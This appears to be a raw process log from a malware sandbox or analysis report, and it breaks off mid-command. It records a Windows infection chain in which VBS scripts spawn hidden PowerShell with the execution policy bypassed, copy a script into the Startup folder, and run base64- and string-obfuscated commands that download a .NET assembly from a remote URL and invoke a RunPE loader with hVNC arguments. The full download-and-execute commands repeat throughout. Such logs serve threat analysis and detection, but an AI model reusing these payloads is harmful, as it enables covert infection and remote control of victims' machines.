Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = 